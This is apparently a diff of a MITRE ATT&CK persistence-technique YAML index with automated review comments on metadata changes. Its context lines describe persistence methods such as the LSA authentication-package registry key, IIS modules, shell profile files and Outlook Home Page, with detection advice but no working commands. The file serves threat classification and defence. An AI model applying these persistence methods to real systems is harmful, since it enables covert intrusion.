+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
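Review bot: `x_mitre_permissions_required` (Administrator, User) is dropped for T1137.003 here, and again for T1137.004 below, yet T1546.004 keeps its `- User` / `- Administrator` entries untouched at the top of its hunk. If this mirrors the upstream objects field for field, fine, but then consumers should treat the field as optional; if the generator is dropping it on some objects and not others, that is a bug. The platform change from `Office 365` to `Office Suite`, the version bump 1.1 -> 1.2 and the added `revoked: false` / `x_mitre_deprecated: false` are consistent with the other Office techniques in this patch.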
@@ -36842,7 +37258,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -36916,11 +37331,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -36937,7 +37351,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -36947,7 +37360,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -36956,19 +37369,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
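Review bot: `Azure AD`, `Office 365` and `Google Workspace` are removed from `x_mitre_platforms` for T1078 and replaced with `Office Suite` and `Identity Provider`; the same rename lands on T1556.006, T1546, T1556.009, T1137.003 and T1137.004 elsewhere in the patch. Any index or filter that selects techniques by the old platform strings will silently lose these entries after regeneration, so check that every per-platform consumer is updated in the same change rather than left matching names that no longer occur.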
@@ -37016,11 +37427,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -37049,24 +37461,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -37101,9 +37515,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -37163,7 +37574,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
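Review bot: besides the `modified` regression (2022-04-25 -> 2021-10-17) already flagged above, the unchanged description lines here show the inline code spans `Get{Extension/Filter}Version`, `Http{Extension/Filter}Proc` and `Terminate{Extension/Filter}` broken onto their own lines with the following comma or period starting the next line. That is pre-existing, but since this object is being regenerated anyway, it is the moment to fix how the generator renders inline code in `description` so the text reads as one sentence.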
@@ -37188,13 +37599,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -37247,8 +37656,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -37296,78 +37705,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -37415,6 +37757,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -37425,9 +37771,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -37436,8 +37786,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
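Review bot: the `bencane blog bashrc` reference is the one citation in this patch whose URL actually changes, from the live bencane.com page to a web.archive.org snapshot, with the retrieval date updated to September 25, 2024 to match the new `modified` time; that is the right way to handle a dead link and worth calling out in the commit message. The remaining sixty-odd added lines are the same `external_references`, `id`, `type`, `created` and marking entries deleted in the earlier T1546.004 hunk, re-emitted in a different order (references now sorted by citation text), so the real change to this object is the archive URL plus the 3.2.0 spec bump.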
@@ -37516,7 +37925,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
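Review bot: the unchanged Authentication Package description has the same inline-code rendering problem as IIS Components: the registry path `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\` and the value `"Authentication Packages"=<target binary>` each end a line and the following text (`with the key value of`, a lone `.`) starts the next one. Pre-existing, but it reads as a broken sentence and the generator fix would cover both objects. The `modified` move from 2022-05-11 to 2022-04-20 is another instance of the backwards timestamp noted earlier.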
@@ -37539,12 +37948,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -37622,41 +38030,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -37665,27 +38043,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -37746,7 +38151,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -37790,7 +38194,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -37812,7 +38216,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -38045,7 +38448,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -38068,7 +38470,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -38098,12 +38500,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -38193,12 +38593,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -38283,7 +38682,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -38348,18 +38746,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -38392,10 +38789,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
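Review bot: `SaaS` is removed from T1556.009's platforms along with `Azure AD`, leaving only `IaaS` and `Identity Provider`, whereas the other techniques renamed in this patch (T1078, T1556.006, T1546) keep `SaaS`. Since the description in the previous hunk still names Okta and JumpCloud as examples, confirm this matches the upstream object and is not the generator dropping a platform; if upstream did drop it, the 1.0 -> 1.1 version bump is the right signal but a note in the commit message would save the next reader the same question.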
@@ -38432,7 +38828,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -38506,7 +38901,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
